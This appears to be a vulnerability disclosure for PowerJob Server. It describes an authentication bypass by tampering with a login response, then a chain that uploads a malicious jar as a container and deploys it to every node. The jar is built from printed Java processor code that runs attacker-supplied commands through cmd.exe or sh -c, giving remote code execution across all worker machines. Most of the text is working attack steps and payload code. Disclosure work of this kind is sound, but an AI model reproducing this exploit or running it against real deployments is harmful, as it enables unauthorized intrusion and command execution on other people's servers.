PowerJob Server Unauthorized Remote Code Execution

PowerJob Remote Code Execution
First, open the homepage, click the App Registration button：

Then use the application and password just registered to log in, capture the package and modify the data field in the return package, and now I can log in to the background of other applications beyond my authority：

We can click Container DevOps - Template generator, fill in the information and get a zip package.

Then we add our own malicious code to the package,just like this ：

Using the maven package command to package the jar, now I have packaged a malicious jar file:
payload
Source Code:

@Component
public class SimpleProcessor implements BasicProcessor {

    @Override
    public ProcessResult process(TaskContext taskContext) {
        OmsLogger omsLogger = taskContext.getOmsLogger();
        omsLogger.info("SimpleProcessor start to process, current JobParams is {}.", taskContext.getJobParams());
        String command = taskContext.getInstanceParams();
        ProcessBuilder builder = new ProcessBuilder();
        Process process = null;
        try {
            if (SystemUtils.IS_OS_WINDOWS) {
                process = builder.command("cmd.exe", "/c", command).redirectErrorStream(true).start();
            } else {
                process = builder.command("sh", "-c", command).redirectErrorStream(true).start();
            }
            InputStream inputStream = process.getInputStream();
            BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
            String line;
            while ((line = reader.readLine()) != null) {
                omsLogger.info(line);
            }
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
        return new ProcessResult(true, "simple processor finished with params=" + command);
    }
}

Click Container Management,New container,FastJar，Upload a malicious jar file：

Click save button,Now we can see the container：

Now click the deploy button to inject malicious code into all nodes：

Then go to the task management page, click the New job button, fill in the information like this
container’s ID#org.example.demo.SimpleProcessor
Schedule info:API

Click More in the task list and the parameters run：

Enter the command to execute, the command will be executed in all machine nodes：

After a few seconds all nodes will execute the command you just entered:：